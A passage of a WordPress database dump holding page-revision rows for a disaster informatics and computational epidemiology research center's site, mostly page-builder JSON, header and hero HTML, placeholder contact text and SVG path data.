<!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',20,'https://gsudice.dataconn.net/?p=302',0,'revision','',0),(303,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',23,'https://gsudice.dataconn.net/?p=303',0,'revision','',0),(304,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 